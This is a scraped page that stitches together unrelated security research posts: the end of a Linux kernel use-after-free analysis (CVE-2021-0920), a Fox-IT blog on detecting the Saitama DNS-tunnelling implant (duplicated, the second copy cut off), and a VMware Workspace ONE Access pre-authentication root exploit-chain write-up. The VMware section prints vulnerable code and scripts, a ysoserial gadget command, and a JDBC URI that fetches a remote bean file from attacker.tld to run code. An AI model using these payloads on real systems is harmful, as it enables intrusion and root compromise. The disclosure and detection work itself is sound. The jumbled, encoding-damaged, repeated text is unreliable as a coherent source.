Start calling recvmsgΒ with MSG_PEEKΒ flag from f 10β, which would expect to receive f 00'
Get skb = skb_peek(&sk->sk_receive_queue), skbΒ is going to be freed by thread 0.
Stage2: for, calls __skb_unlinkΒ and kfree_skbΒ later.
state->recv_actor(skb, skip, chunk, state)Β UAF
GC finished.
Start garbage collection.
Get f 10ββ
Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsgΒ syscall because it clears skb.fp, the passed file list.Β However, if the first recvmsgΒ syscall doesnβt set the MSG_PEEKΒ flag, the UAF can be avoided because unix_notinflightΒ is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle.
Since MSG_PEEKΒ is not serialized with the garbage collection, when recvmsgΒ is called with MSG_PEEKΒ set, the kernel still considers f 11Β as a garbage candidate. For this reason, the following next recvmsgΒ will eventually trigger the bug due to the inconsistent state of the garbage collection process.
In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.
Patch in 2021
Letβs check the official patchΒ for CVE-2021-0920. For the MSG_PEEKΒ branch, it requests theΒ garbage collection lock unix_gc_lockΒ before performing sensitive actionsΒ and immediately releases it afterwards:
β¦
+Β Β Β Β spin_lock(&unix_gc_lock);
+Β Β Β Β spin_unlock(&unix_gc_lock);
β¦
The patch is confusing - itβs rare to see such lock usage in software development. Regardless, the MSG_PEEKΒ flag now waits for the completion of the garbage collector, so the UAF issue is resolved.
BUG_ON Added in 2017
Andrey Ulanov from Google in 2017 found another issue in unix_gcΒ and provided a fix commit. Additionally, the patch added a BUG_ONΒ for the inflight count:
At first glance, it seems thatΒ the BUG_ONΒ can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, Β it can waive the BUG_ONΒ check by heap spray.
To recap, we have discussed the kernel internals of SCM_RIGHTSΒ and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEKΒ flag with the recvmsgΒ syscall and how it leads to a kernel UAF by a subtle and arcane race condition.
The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel.
In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.
A recently uncovered malware sample dubbed βSaitamaβ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Groupβs Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama.
Introduction
For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTPβs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.Β Β
In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed βSaitamaβ, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries. Β
Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCβs) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process. Β
To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama. This can be used to control the implant in a lab environment. Moreover, βon the wireβ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implantβs traffic, using a Suricata signature and behavioural detection.Β
Reconstructing the Saitama trafficΒ
The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implantβs behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available.Β
If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the βPCAP or it didnβt happenβ philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP.Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant βfor the greater goodβ, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.Β Β
Letβs do the twist
The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attackerβs perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.Β Β
For this, the Saitama implant relies on continuously shuffling the character set used to construct DNS queries. While this shuffle makes it near-impossible for two consecutive DNS queries to be the same, it does require the server and client to be perfectly in sync for them to both shuffle their character sets in the same way.Β Β
On startup, the Saitama implant generates a random number between 0 and 46655 and assigns this to a counter variable. Using a shared secret key (βharutoβ for the variant discussed here) and a shared initial character set (βrazupgnv2w01eos4t38h7yqidxmkljc6b9f5β), the client encodes this counter and sends it over DNS to the C2 server. This counter is then used as the seed for a Pseudo-Random Number Generator (PRNG). Saitama uses the Mersenne Twister to generate a pseudo-random number upon every βtwistβ.Β
Function used by Saitama client to convert an integer into an encoded string
To encode this counter, the implant relies on a function named β_IntToStringβ. This function receives an integer and a βbase stringβ, which for the first DNS query is the same initial, shared character set as identified in the previous paragraph. Until the input number is equal or lower than zero, the function uses the input number to choose a character from the base string and prepends that to the variable βstrβ which will be returned as the function output. At the end of each loop iteration, the input number is divided by the length of the baseString parameter, thus bringing the value down.Β
To determine the initial seed, the server has to βinvertβ this function to convert the encoded string back into its original number. However, information gets lost during the client-side conversion because this conversion rounds down without any decimals. The server tries to invert this conversion by using simple multiplication. Therefore, the server might calculate a number that does not equal the seed sent by the client and thus must verify whether the inversion function calculated the correct seed. If this is not the case, the server literately tries higher numbers until the correct seed is found.Β Β Β
Once this hurdle is taken, the rest of the server-side implementation is trivial. The client appends its current counter value to every DNS query sent to the server. This counter is used as the seed for the PRNG. This PRNG is used to shuffle the initial character set into a new one, which is then used to encode the data that the client sends to the server. Thus, when both server and client use the same seed (the counter variable) to generate random numbers for the shuffling of the character set, they both arrive at the exact same character set. This allows the server and implant to communicate in the same βlanguageβ. The server then simply substitutes the characters from the shuffled alphabet back into the βbaseβ alphabet to derive what data was sent by the client.Β Β
Server-side implementation to arrive at the same shuffled alphabet as the client
Twist, Sleep, Send, Repeat
Many C2 frameworks allow attackers to manually set the minimum and maximum sleep times for their implants. While low sleep times allow attackers to more quickly execute commands and receive outputs, higher sleep times generate less noise in the victim network. Detection often relies on thresholds, where suspicious behaviour will only trigger an alert when it happens multiple times in a certain period.Β Β
The Saitama implant uses hardcoded sleep values. During active communication (such as when it returns command output back to the server), the minimum sleep time is 40 seconds while the maximum sleep time is 80 seconds. On every DNS query sent, the client will pick a random value between 40 and 80 seconds. Moreover, the DNS query is not sent to the same domain every time but is distributed across three domains. On every request, one of these domains is randomly chosen. The implant has no functionality to alter these sleep times at runtime, nor does it possess an option to βskipβ the sleeping step altogether.Β Β
Sleep configuration of the implant. The integers represent sleep times in milliseconds
These sleep times and distribution of communication hinder detection efforts, as they allow the implant to further βblend inβ with legitimate network traffic. While the traffic itself appears anything but benign to the trained eye, the sleep times and distribution bury the βneedleβ that is this implantβs traffic very deep in the haystack of the overall network traffic.Β Β
For attackers, choosing values for the sleep time is a balancing act between keeping the implant stealthy while keeping it usable. Considering Saitamaβs sleep times and keeping in mind that every individual DNS query only transmits 15 bytes of output data, the usability of the implant is quite low. Although the implant can compress its output using zlib deflation, communication between server and client still takes a lot of time. For example, the standard output of the βwhoami /privβ command, which once zlib deflated is 663 bytes, takes more than an hour to transmit from victim machine to a C2 server.Β
Transmission between server implementation and the implant
The implant does contain a set of hardcoded commands that can be triggered using only one command code, rather than sending the command in its entirety from the server to the client. However, there is no way of knowing whether these hardcoded commands are even used by attackers or are left in the implant as a means of misdirection to hinder attribution. Moreover, the output from these hardcoded commands still has to be sent back to the C2 server, with the same delays as any other sent command.Β
Detection
Detecting DNS tunnelling has been the subject of research for a long time, as this technique can be implemented in a multitude of different ways. In addition, the complications of the communication channel force attackers to make more noise, as they must send a lot of data over a channel that is not designed for that purpose. While βidleβ implants can be hard to detect due to little communication occurring over the wire, any DNS implant will have to make more noise once it starts receiving commands and sending command outputs. These communication βburstsβ is where DNS tunnelling can most reliably be detected. In this section we give examples of how to detect Saitama and a few well-known tools used by actual adversaries.Β Β
Signature-basedΒ
Where possible we aim to write signature-based detection, as this provides a solid base and quick tool attribution. The randomization used by the Saitama implant as outlined previously makes signature-based detection challenging in this case, but not impossible. When actively communicating command output, the Saitama implant generates a high number of randomized DNS queries. This randomization does follow a specific pattern that we believe can be generalized in the following Suricata rule:Β
Only trigger if there are more than 50 queries in the last 3600 seconds. And only trigger once per 3600 seconds.Β
Table one: Content matches for Suricata IDS rule
Β The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the βsend and receiveβ command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. Followed by 20 bytes of base-32 encoded output. Lastly the current value for the βcounterβ variable will be sent. As this number can range between 0 and 46656, this takes between 1 and 5 bytes.Β
Behaviour-basedΒ
The randomization that makes it difficult to create signatures is also to the defenderβs advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited.Β Β
Table two: Example DNS queries for various toolings that support DNS tunnelling
Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.Β Β
This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as βrandomizedβ. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour.Β Β
To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives.Β
In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign.Β
While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs.Β
Conclusion
When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implantβs behaviour. This can subsequently be used for detection engineering purposes.Β
Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.Β Β
Resources
With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.Β Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub.Β Β
This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.Β
On March 2nd, I reported several security vulnerabilities to VMWare impacting their Identity Access Management (IAM) solution. In this blog post I will discuss some of the vulnerabilities I found, the motivation behind finding such vulnerabilities and how companies can protect themselves. The result of the research project concludes with a pre-authenticated remote root exploit chain nicknamed Hekate. The advisories and patches for these vulnerabilities can be found in the references section.
Introduction
Single Sign On (SSO) has become the dominant authentication scheme to login to several related, yet independent, software systems. At the core of this are the identity providers (IdP). Their role is to perform credential verification and to supply a signed token containing assertions that a service providers (SP) can consume for access control. This is implemented using a protocol called Security Assertion Markup Language (SAML).
On the other hand, when an application requests resources on behalf of a user and theyβre granted, then an authorization request is made to an authorization server (AS). The AS exchanges a code for a token which is presented to a resource server (RS) and the requested resources are consumed by the requesting application. This is known as Open Authorization (OAuth), the auth here is standing for authorization and not authentication.
Whilst OAuth2 handles authorization (identity), and SAML handles authentication (access) a solution is needed to manage both since an organizations network perimeter can get very wide and complex. Therefore, a market for Identity and Access Management (IAM) solutions have become very popular in the enterprise environment to handle both use cases at scale.
Motivation
This project was motivated by a high impact vulnerabilities affecting similar software products, letβs take a look in no particular order:
Cisco Identity Services Engine
This product was pwned by Pedro Ribeiro and Dominik Czarnota using a pre-authenticated stored XSS vulnerability leading to full remote root access chaining an additional two vulnerabilities.
ForgeRock OpenAM
This product was pwned by Michael Stepankin using a pre-authenticated deserialization of untrusted data vulnerability in a 3rd party library called jato. Michael had to get creative here by using a custom Java gadget chain to exploit the vulnerability.
Oracle Access Manager (OAM)
Peter Json and Jangblogged about a pre-authenticated deserialization of untrusted data vulnerability impacting older versions of OAM.
VMWare Workspace ONE Access
Two high impact vulnerabilities were discovered here. The first being CVE-2020-4006 which was exploited in the wild (ITW) by state sponsored attackers which excited my interest initially. The details of this bug was first revealed by William Vu and essentially boiled down to a post-authenticated command injection vulnerability. The fact that this bug was post-authenticated and yet was still exploited in the wild (ITW) likely means that this software product is of high interest to attackers.
With most of this knowledge before I even started, I knew that vulnerabilities discovered in a system like this would have a high impact. So, at the time I asked myself: does a pre-authenticated remote code execution vulnerability/chain exist in this code base?
Version
The vulnerable version at the time of testing was 21.08.0.1 which was the latest and deployed using the identity-manager-21.08.0.1-19010796_OVF10.ova (SHA1: 69e9fb988522c92e98d2910cc106ba4348d61851) file. It was released on the 9th of December 2021 according to the release notes. This was a Photon OS Linux deployment designed for the cloud.
Challenges
I had several challenges and I think itβs important to document them so that others are not discouraged when performing similar audits.
Heavy use of Spring libraries
This software product heavily relied on several spring components and as such didnβt leave room for many errors in relation to authentication. Interceptors played a huge role in the authentication process and were found to not contain any logic vulnerabilities in this case.
Additionally, With Springβs StrictHttpFirewall enabled, several attacks to bypass the authentication using well known filter bypass attacks failed.
Minimal attack surface
There was very little pre-authenticated attack surface that exposed functionality of the application outside of authentication protocols like SAML and OAuth 2.0 (including OpenID Connect) which minimizes the chance of discovering a pre-authenticated remote code execution vulnerability.
Code quality
The code quality of this product was very good. Having audited many Java applications in the past, I took notice that this product was written with security in mind and the overall layout of libraries, syntax used, spelling of code was a good reflection of that. In the end, I only found two remote code execution vulnerabilities and they were in a very similar component.
Letβs move on to discussing the vulnerabilities in depth.
OAuth2TokenResourceController Access Control Service (ACS) Authentication Bypass Vulnerability
The com.vmware.horizon.rest.controller.oauth2.OAuth2TokenResourceController class has two exposed endpoints. The first will generate an activation code for an existing oauth2 client:
/* */@RequestMapping(value={"/generateActivationToken/{id}"},method={RequestMethod.POST})/* */@ResponseBody/* */@ApiOperation(value="Generate and update activation token for an existing oauth2 client",response=OAuth2ActivationTokenMedia.class)/* */@ApiResponses({@ApiResponse(code=500,message="Generation failed, unknown error."),@ApiResponse(code=400,message="Generation failed, client is invalid or not specified.")})/* */publicOAuth2ActivationTokenMediagenerateActivationToken(@ApiParam(value="OAuth 2.0 Client identifier",example="\"my-auth-grant-client1\"",required=true)@PathVariable("id")StringclientId,HttpServletRequestrequest)throwsMyOneLoginException{/* 128 */OrganizationRuntimeorgRuntime=getOrgRuntime(request);/* 129 */OAuth2Clientclient=this.oAuth2ClientService.getOAuth2Client(orgRuntime.getOrganizationId().intValue(),clientId);/* 130 */if(client==null||client.getIdUser()==null){/* 131 */thrownewBadRequestException("invalid.client",newObject[0]);/* */}
The second will activate the device OAuth2 client by exchanging the activation code for a client ID and client secret:
/* */@RequestMapping(value={"/activate"},method={RequestMethod.POST})/* */@ResponseBody/* */@AllowExecutionWhenReadOnly/* */@ApiOperation(value="Activate the device client by exchanging an activation code for a client ID and client secret.",notes="This endpoint is used in the dynamic mobile registration flow. The activation code is obtained by calling the /SAAS/auth/device/register endpoint. The client_secret and client_id returned in this call will be used in the call to the /SAAS/auth/oauthtoken endpoint.",response=OAuth2ClientActivationDetails.class)/* */@ApiResponses({@ApiResponse(code=500,message="Activation failed, unknown error."),@ApiResponse(code=404,message="Activation failed, organization not found."),@ApiResponse(code=400,message="Activation failed, activation code is invalid or not specified.")})/* */publicOAuth2ClientActivationDetailsactivateOauth2Client(@ApiParam(value="the activation code",required=true)@RequestBodyStringactivationCode,HttpServletRequestrequest)throwsMyOneLoginException{/* 102 */OrganizationRuntimeorganizationRuntime=getOrgRuntime(request);/* */try{/* 104 */returnthis.activationTokenService.activateAndGetOAuth2Client(organizationRuntime.getOrganization(),activationCode);/* 105 */}catch(EncryptionExceptione){/* 106 */thrownewBadRequestException("invalid.activation.code",e,newObject[0]);/* 107 */}catch(MyOneLoginExceptione){/* *//* 109 */if(e.getCode()==80480||e.getCode()==80476||e.getCode()==80440||e.getCode()==80558){/* 110 */thrownewBadRequestException("invalid.activation.code",e,newObject[0]);/* */}/* 112 */throwe;/* */}/* */}
This is enough for an attacker to then exchange the client_id and client_secret for an OAuth2 token to achieve a complete authentication bypass. Now, this wouldnβt have been so easily exploitable if no default OAuth2 clients were present, but as it turns out. There are two internal clients installed by default:
We can verify this when we check the database on the system:
These clients are created in several locations, one of them is in the com.vmware.horizon.rest.controller.system.BootstrapController class. I wonβt bore you will the full stack trace, but it essentially leads to a call to createTenant in the com.vmware.horizon.components.authentication.OAuth2RemoteAccessServiceImpl class:
/* */publicbooleancreateTenant(intorgId,StringtenantId){/* */try{/* 335 */createDefaultServiceOAuth2Client(orgId);// 1/* 336 */}catch(Exceptione){/* 337 */log.warn("Failed to create the default service oauth2 client for org "+tenantId,e);/* 338 */returnfalse;/* */}/* 340 */returntrue;/* */}
At [1] the code calls createDefaultServiceOAuth2Client:
The code at [2] calls createSystemScopedServiceOAuth2Client which, as the name suggests creates a system scoped oauth2 client using the clientId βService__OAuth2Clientβ. I actually found another authentication bypass documented as SRC-2022-0007 using variant analysis, however it impacts only the cloud environment due to the on-premise version not loading the authz Spring profile by default.
At [1] the code checks to see if there are any existing organizations (there will be if itβs set-up correctly) and at [2] the code validates that an admin is requesting the endpoint. At [3] the code calls DbConnectionCheckServiceImpl.checkConnection using the attacker controlled jdbcUrl.
The code calls FactoryHelper.getConnection at [5].
/* */publicConnectiongetConnection(StringjdbcUrl,Stringusername,Stringpassword)throwsSQLException{/* */try{/* 427 */returnDriverManager.getConnection(jdbcUrl,username,password);// 6/* 428 */}catch(Exceptionex){/* 429 */if(ex.getCause()!=null&&ex.getCause().toString().contains("javax.net.ssl.SSLHandshakeException")){/* 430 */log.info(String.format("ssl handshake failed for the user:%s ",newObject[]{username}));/* 431 */thrownewSQLException("database.connection.ssl.notSuccess");/* */}/* 433 */log.info(String.format("Connection failed for the user:%s ",newObject[]{username}));/* 434 */thrownewSQLException("database.connection.notSuccess");/* */}/* */}
Finally, at [6] the attacker can reach a DriverManager.getConnection sink which will lead to an arbitrary JDBC URI connection. Given the flexibility of JDBC, the attacker can use any of the deployed drivers within the application. This vulnerability can lead to remote code execution as the horizon user which will be discussed in the exploitation section.
publishCaCert and gatherConfig Privilege Escalation
After gaining remote code execution as the horizon user, we can exploit the following vulnerability to gain root access. This section contains two bugs, but I decided to report it as a single vulnerability due to the way I (ab)used them in the final exploit chain.
The publishCaCert.hzn script allows attackers to disclose sensitive files.
The gatherConfig.hzn script allows attackers to take ownership of sensitive files
These scripts can be executed by the horizon user with root privileges without a password using sudo. They were not writable by the horizon user so I audited the scripts for logical issues to escalate cleanly.
publishCaCert.hzn:
For this bug we can see that it will take a file on the command line and copy it to /etc/ssl/certs/ at [1] and then make it readable/writable by the owner at [2]!
#!/bin/sh#Script to isolate sudo access to just publishing a single file to the trusted certs directoryCERTFILE=$1DESTFILE=$(basename$2)cp-f$CERTFILE /etc/ssl/certs/$DESTFILE // 1
chmod 644 /etc/ssl/certs/$DESTFILE // 2
c_rehash > /dev/null
gatherConfig.hzn:
For taking ownership, we can use a symlink called debugConfig.txt and point it to a root owned file at [1].
#!/bin/bash## Minor: Copyright 2019 VMware, Inc. All rights reserved.. /usr/local/horizon/scripts/hzn-bin.inc
. /usr/local/horizon/scripts/manageTcCfg.inc
DEBUG_FILE=$1#...function gatherConfig(){
printLines
echo"1) cat /usr/local/horizon/conf/flags/sysconfig.hostname">${DEBUG_FILE}#...chown$TOMCAT_USER:$TOMCAT_GROUP$DEBUG_FILE // 1
}if[-z"$DEBUG_FILE"]then
usage
else
DEBUG_FILE=${DEBUG_FILE}/"debugConfig.txt"
gatherConfig
fi
Technique 1 - Remote code execution via the MySQL JDBC Driver autoDeserialize
It was also possible to perform remote code execution via the MySQL JDBC driver by using the autoDeserialize property. The server would connect back to the attackerβs malicious MySQL server where it could deliver an arbitrary serialized Java object that could be deserialized on the server. As it turns out, the off the shell ysoserial CommonsBeanutils1 gadget worked a treat: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 <cmd>.
This technique was first presented by Yang Zhang, Keyi Li, Yongtao Wang and Kunzhe Chai at Blackhat Europe in 2019. This was the technique I used in the exploit I sent to VMWare because I wanted to hint at their usage of unsafe libraries that contain off the shell gadget chains in them!
Technique 2 - Remote code execution via the PostgreSQL JDBC Driver socketFactory
It was possible to perform remote code execution via the socketFactory property of the PostgreSQL JDBC driver. By setting the socketFactory and socketFactoryArg properties, an attacker can trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Since the application was using Spring with a Postgres database, it was the perfect candidate to (ab)use FileSystemXmlApplicationContext!
Proof of Concept: jdbc:postgresql://si/saas?&socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://attacker.tld:9090/bean.xml.
But of course, we can improve on this. Inspired by RicterZ, letβs say you want to exploit the bug without internet access. You can re-use the com.vmware.licensecheck.LicenseChecker class VMWare provides us and mix deserialization with the PostgreSQL JDBC driver attack.
Letβs walk from one of the LicenseChecker constructors, right to the vulnerable sink.
At [1] the code calls another constructor in the same class with the parsed in string. At [2] the code calls setState on the LicenseHandle class:
publicvoidsetState(Stringvar1){if(var1!=null&&var1.length()>=1){try{byte[]var2=MyBase64.decode(var1);// 3if(var2!=null&&this.deserialize(var2)){// 4this._state=var1;this._isDirty=false;}}catch(Exceptionvar3){log.debug(newObject[]{"failed to decode state: "+var3.getMessage()});}}}
At [3] the code base64 decodes the string and at [4] the code then calls deserialize:
privatebooleandeserialize(byte[]var1){if(var1==null){returntrue;}else{try{ByteArrayInputStreamvar2=newByteArrayInputStream(var1);DataInputStreamvar3=newDataInputStream(var2);intvar4=var3.readInt();switch(var4){case-889267490:returnthis.deserialize_v2(var3);// 5default:log.debug(newObject[]{"bad magic: "+var4});}}catch(Exceptionvar5){log.debug(newObject[]{"failed to de-serialize handle: "+var5.getMessage()});}returnfalse;}}
You can probably see where this is going already. At [5] the code calls deserialize_v2 if a supplied int is -889267490:
privatebooleandeserialize_v2(DataInputStreamvar1)throwsIOException{byte[]var2=Encrypt.readByteArray(var1);if(var2==null){log.debug(newObject[]{"failed to read cipherText"});returnfalse;}else{try{byte[]var3=Encrypt.decrypt(var2,newString(keyBytes_v2));// 6if(var3==null){log.debug(newObject[]{"failed to decrypt state data"});returnfalse;}else{ByteArrayInputStreamvar4=newByteArrayInputStream(var3);ObjectInputStreamvar5=newObjectInputStream(var4);this._htEvalStart=(Hashtable)var5.readObject();// 7log.debug(newObject[]{"restored "+this._htEvalStart.size()+" entries from state info"});returntrue;}}catch(Exceptionvar6){log.warn(newObject[]{var6.getMessage()});returnfalse;}}}
At [6] the code will call decrypt, and decrypt the string using a hardcoded key. Then at [7] the code will call readObject on the attacker supplied string. At this point we could supply our deserialization gadget right into the jdbc uri string, removing any outgoing connection requirement! Here is a proof of concept to execute the command touch /tmp/pwn:
I have included the licensecheck-1.1.5.jar library in the exploit directory so that the exploit can be re-built and replicated. It should be noted that the first connection to a PostgreSQL database doesnβt need to be established for the attack to succeed so an invalid host/port is perfectly fine. Details about this attack and others similar to it can be found in the excellent blog post by Xu Yuanzhen.
The final point I will make about this is that the LicenseChecker class could have also been used to exploit CVE-2021-21985 since the licensecheck-1.1.5.jar library was loaded into the target vCenter process coupled with publicly available gadget chains.
publishCaCert and gatherConfig Privilege Escalation
This exploit was straight forward and involved overwriting the permissions of the certproxyService.sh script so that it can be modified by the horizon user.
Proof of Concept
I built three exploits called Hekate (thatβs pronounced as heh-ka-teh). The first exploit leverages the MySQL JDBC driver and the second exploit leverages the PostgreSQL JDBC driver. Both exploits target the server and client sides, requiring an outbound connection to the attacker.
The third exploit leverages the PostgreSQL JDBC driver again, this time re-using the com.vmware.licensecheck.* classes and avoids any outbound network connections to the attacker. This is the exploit that was demonstrated at Black Hat USA 2022.
All the vulnerabilities used in Hekate also impacted the cloud version of the VMWare Workspace ONE Access in its default configuration.
Exposure
Using a quick favicon hash search, Shodan reveals ~700 active hosts were vulnerable at the time of discovery. Although the exposure is limited, the systems impacted are highly critical. An attacker will be able to gain access to third party systems, grant assertions and breach the perimeter of an enterprise network all of which canβt be done with your run-of-the-mill exposed IoT device.
Conclusion
The limitations of CVE-2020-4006 was that it required authentication and it was targeting port 8443. In comparison, this attack chain targets port 443 which is much more likely exposed externally. Additionally, no authentication was required all whilst achieving root access making it quite disastrous and results in the complete compromise of the affected appliance. Finally, it can be exploited in a variety of ways such as client-side or server-side without the requirement of a deserialization gadget.
The Microsoft Bug Bounty Programs and partnerships with the global security research community are important parts of Microsoftβs holistic approach to defending customers against security threats. Our bounty programs incentivize security research in high-impact areas to stay ahead of the ever-changing security landscapes, emerging technology, and new threats. Security Researchers help us secure millions of β¦
A recently uncovered malware sample dubbed βSaitamaβ was uncovered by security firm Malwarebytes in a weaponized document, possibly targeted towards the Jordan government. This Saitama implant uses DNS as its sole Command and Control channel and utilizes long sleep times and (sub)domain randomization to evade detection. As no server-side implementation was available for this implant, our detection engineers had very little to go on to verify whether their detection would trigger on such a communication channel. This blog documents the development of a Saitama server-side implementation, as well as several approaches taken by Fox-IT / NCC Groupβs Research and Intelligence Fusion Team (RIFT) to be able to detect DNS-tunnelling implants such as Saitama. The developed implementation as well as recordings of the implant are shared on the Fox-IT GitHub.
Introduction
For its Managed Detection and Response (MDR) offering, Fox-IT is continuously building and testing detection coverage for the latest threats. Such detection efforts vary across all tactics, techniques, and procedures (TTPβs) of adversaries, an important one being Command and Control (C2). Detection of Command and Control involves catching attackers based on the communication between the implants on victim machines and the adversary infrastructure.Β Β
In May 2022, security firm Malwarebytes published a two1-part2 blog about a malware sample that utilizes DNS as its sole channel for C2 communication. This sample, dubbed βSaitamaβ, sets up a C2 channel that tries to be stealthy using randomization and long sleep times. These features make the traffic difficult to detect even though the implant does not use DNS-over-HTTPS (DoH) to encrypt its DNS queries. Β
Although DNS tunnelling remains a relatively rare technique for C2 communication, it should not be ignored completely. While focusing on Indicators of Compromise (IOCβs) can be useful for retroactive hunting, robust detection in real-time is preferable. To assess and tune existing coverage, a more detailed understanding of the inner workings of the implant is required. This blog will use the Saitama implant to illustrate how malicious DNS tunnels can be set-up in a variety of ways, and how this variety affects the detection engineering process. Β
To assist defensive researchers, this blogpost comes with the publication of a server-side implementation of Saitama on the Fox-IT GitHub. This can be used to control the implant in a lab environment. Moreover, βon the wireβ recordings of the implant that were generated using said implementation are also shared as PCAP and Zeek logs. This blog also details multiple approaches towards detecting the implantβs traffic, using a Suricata signature and behavioural detection.Β
Reconstructing the Saitama trafficΒ
The behaviour of the Saitama implant from the perspective of the victim machine has already been documented elsewhere3. However, to generate a full recording of the implantβs behaviour, a C2 server is necessary that properly controls and instructs the implant. Of course, the source code of the C2 server used by the actual developer of the implant is not available.Β
If you aim to detect the malware in real-time, detection efforts should focus on the way traffic is generated by the implant, rather than the specific domains that the traffic is sent to. We strongly believe in the βPCAP or it didnβt happenβ philosophy. Thus, instead of relying on assumptions while building detection, we built the server-side component of Saitama to be able to generate a PCAP.Β
The server-side implementation of Saitama can be found on the Fox-IT GitHub page. Be aware that this implementation is a Proof-of-Concept. We do not intend on fully weaponizing the implant βfor the greater goodβ, and have thus provided resources to the point where we believe detection engineers and blue teamers have everything they need to assess their defences against the techniques used by Saitama.
Letβs do the twist
The usage of DNS as the channel for C2 communication has a few upsides and quite some major downsides from an attackerβs perspective. While it is true that in many environments DNS is relatively unrestricted, the protocol itself is not designed to transfer large volumes of data. Moreover, the caching of DNS queries forces the implant to make sure that every DNS query sent is unique, to guarantee the DNS query reaches the C2 server.Β Β
